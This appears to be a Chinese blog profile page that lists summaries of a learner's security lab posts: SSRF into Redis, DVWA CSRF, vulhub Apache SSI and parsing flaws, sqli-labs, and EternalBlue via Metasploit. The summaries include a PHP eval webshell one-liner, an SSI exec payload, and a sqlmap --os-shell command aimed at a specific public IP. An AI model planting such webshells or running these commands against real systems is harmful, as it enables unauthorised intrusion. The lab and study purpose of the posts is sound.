自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 ssrf,利用redis反弹shell

在docker中搭建容器,利用ssrf的漏洞攻击redis服务反弹shell

2023-03-20 21:51:14 429

原创 dvwa中csrf漏洞练习

使用docker搭建的dvwa环境,练习csrf中的low,medium等级

2023-03-19 00:30:56 137

原创 nark靶场练习

尝试使用各种工具在nark靶场中练习

2023-03-17 00:36:26 158

原创 Windows server2003Internet信息服务管理器安装及卸载

Windows server2003Internet信息服务管理器安装及卸载

2023-03-05 13:48:26 917

原创 apache文件解析漏洞复现

复现Apache文件上传漏洞

2023-02-27 00:58:09 304

原创 docker安装libapache2-mod-php7.0出错

在使用docker配置Apachephp时出错

2023-02-25 14:42:52 164

原创 vulhub中apache SSI漏洞

首先进入vulhub路径,找到ssi-rce目录并进入使用docker-compose up -d命令启动环境如果启动失败,可以进入docker-compose.yml查看端口是否被占用,修改一下端口号启动成功之后使用docker ps查看一下进程是否在进行成功启动就可以在浏览器中输入本地IP+端口号/upload.php,即可得到这样的界面先在桌面上创建一个.txt文档,输入<!--#exec cmd="date" --> date可更换,然后将文件后

2023-02-19 22:45:59 94

原创 sqli labs 第八关

第八关过程及语法命令

2023-02-17 00:41:04 208

原创 【无标题】Behinder双击无法打开

我下载完Behinder3.0版本的压缩包后解压,然后点击Behinder.jar死活打不开,上网找了原因,说是Java11版本以后没有JavaFX了,需要自自己去安装JavaFX。先使用java --version命令去本地查看一下Java的版本,再去这个https://gluonhq.com/products/javafx/网址里面找到对应版本的SDK版本号下载。如上所示,这就把需要的东西下载好了,下面是配置方法,分为两个。方法一:打开Behinder.jar所在的目录,在改目录

2023-02-12 18:06:21 250

原创 使用蚁剑向网站上传小马

准备,被攻击的网站由PHP语言编写,创建一个php文件,编辑脚本<? php @eval($_POST['123'])?>sqlmap -u"http://43.138.211.45/about.php?listid=6" --os-shell进行攻击选择语言,攻击的网站是由PHP语言编写,输入4,回车,输入y输入2选择自定义位置,回车,输入根目录位置查看网站的根目录是/var/www/html回车得到 两个网址复制第一个网址,在浏览器中打开

2023-02-03 19:28:27 874

原创 虚拟机centos7安装 ,详细介绍

准备:CentOS7的下载镜像,vmware步骤:打开VMware,点击左上角文件,选择新建虚拟机选择自定义安装点击下一步选择稍后安装操作系统点击下一步自定义磁盘大小此时裸机已安装完成,但还没有操作系统,接下来需要安装镜像放置好下载的镜像文件,打开虚拟机,显示如下界面,选中“Install CentOS 7”按住Tab健,可以对下面的行进行编辑,按空格键,直到另起一行,输入命令“net.ifna

2023-01-27 12:21:41 232

原创 详细复现永恒之蓝ms17-010

一、实验环境:没有补丁的win7作为目标机器 Kali作为攻击机器二、实验步骤1.首先进入root用户,输入msfconsole进入msf6端2.利用命令search ms17-010搜索ms17-010漏洞脚本,得到四种不同的模块3.先使用脚本中的扫描模块,即第三个,输入命令use auxiliary/scanner/smb/smb_ms17_0104. 查看配置表,show options,可以看到此时RHOSTS是

2023-01-15 09:02:26 99

原创 超详细,win7虚拟机安装

安装前准备:①下载好win7的镜像,最好新建一个文件夹便于区分②正常运行的VMware下面开始安装流程选择好版本如下,再点击下一步点击浏览,最好新建一个文件夹便于记忆和区分,如下所示,再点击确定按照上图所示进行选择,再点击下一步点击自定义硬件上图所示,点击浏览, 找到下载好的win7镜像文件,打开这样就大功告成啦!

2023-01-09 23:33:36 2580

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除